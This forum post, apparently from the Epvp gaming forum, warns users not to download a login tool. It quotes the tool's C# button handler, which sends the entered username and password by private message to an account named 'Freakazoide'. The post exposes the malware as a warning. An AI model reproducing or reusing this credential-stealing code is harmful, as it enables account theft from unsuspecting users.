DONT DOWNLOAD IT
This will happen if you log in into Epvp with this Tool
It steals your UserData and sends them to Freakozide
Quote:
private void Button2_Click(object sender, EventArgs e)
{
if (this.xLibrary.SendLogin(this.TextBox3.Text, this.TextBox2.Text))
{
MessageBox.Show("Login done");
this.GroupBox1.Show();
this.TextBox1.Show();
this.Button1.Show();
this.xLibrary.SendPrivateMessage("Freakazoide", "Name and PW", this.TextBox3.Text + this.TextBox2.Text);
}
else
{
MessageBox.Show("Login error");
}
}
|
I Attached the infected Files and the Original Sorucecode from him ...